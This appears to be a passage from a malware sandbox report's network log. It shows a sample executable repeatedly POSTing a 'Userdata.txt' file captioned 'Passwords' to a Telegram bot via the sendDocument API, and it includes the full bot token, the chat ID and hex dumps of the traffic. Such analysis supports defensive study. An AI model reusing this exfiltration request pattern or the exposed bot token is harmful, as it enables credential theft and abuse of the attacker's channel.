                                                                                    2025-01-10 20:41:51 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 32 32 31 63 30 30 39 30 39 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                    Data Ascii: --===============8dd33221c009098Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                    2025-01-10 20:41:51 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Fri, 10 Jan 2025 20:41:51 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 534
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-10 20:41:51 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 38 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 37 31 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":44680,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541711,"document":{"file_name":"U


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    21192.168.2.949988149.154.167.2204434256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-10 20:41:52 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary================8dd33388384d681
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 1090
                                                                                    2025-01-10 20:41:52 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 33 38 38 33 38 34 64 36 38 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                    Data Ascii: --===============8dd33388384d681Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                    2025-01-10 20:41:53 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Fri, 10 Jan 2025 20:41:53 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 535
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-10 20:41:53 UTC535INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 38 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 37 31 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":44682,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541713,"document":{"file_name":"U


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    22192.168.2.950001149.154.167.2204434256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-10 20:41:54 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary================8dd335177883a2d
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 1090
                                                                                    2025-01-10 20:41:54 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 35 31 37 37 38 38 33 61 32 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                    Data Ascii: --===============8dd335177883a2dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                    2025-01-10 20:41:55 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Fri, 10 Jan 2025 20:41:55 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 534
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-10 20:41:55 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 38 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 37 31 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":44684,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541715,"document":{"file_name":"U


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    23192.168.2.950014149.154.167.2204434256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-10 20:41:56 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary================8dd336907e6a9ae
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 1090
                                                                                    2025-01-10 20:41:56 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 36 39 30 37 65 36 61 39 61 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                    Data Ascii: --===============8dd336907e6a9aeContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                    2025-01-10 20:41:56 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Fri, 10 Jan 2025 20:41:56 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 535
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-10 20:41:56 UTC535INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 38 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 37 31 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":44686,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541716,"document":{"file_name":"U


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    24192.168.2.950022149.154.167.2204434256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-10 20:41:58 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary================8dd337f3852d690
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 1090
                                                                                    2025-01-10 20:41:58 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 37 66 33 38 35 32 64 36 39 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                    Data Ascii: --===============8dd337f3852d690Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                    2025-01-10 20:41:58 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Fri, 10 Jan 2025 20:41:58 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 534
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-10 20:41:58 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 38 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 37 31 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":44689,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541718,"document":{"file_name":"U


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    25192.168.2.950024149.154.167.2204434256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-10 20:42:00 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary================8dd339d20965d7c
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 1090
                                                                                    2025-01-10 20:42:00 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 39 64 32 30 39 36 35 64 37 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                    Data Ascii: --===============8dd339d20965d7cContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                    2025-01-10 20:42:00 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Fri, 10 Jan 2025 20:42:00 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 534
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-10 20:42:00 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 39 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 37 32 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":44691,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541720,"document":{"file_name":"U


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    26192.168.2.950026149.154.167.2204434256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-10 20:42:02 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary================8dd33c3fda625b7
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 1090
                                                                                    2025-01-10 20:42:02 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 63 33 66 64 61 36 32 35 62 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                    Data Ascii: --===============8dd33c3fda625b7Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                    2025-01-10 20:42:03 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Fri, 10 Jan 2025 20:42:03 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 534
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-10 20:42:03 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 39 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 37 32 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":44693,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541723,"document":{"file_name":"U


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    27192.168.2.950028149.154.167.2204434256C:\Users\user\Desktop\v4nrZtP7K2.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-10 20:42:04 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary================8dd33e6d407da33
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 1090
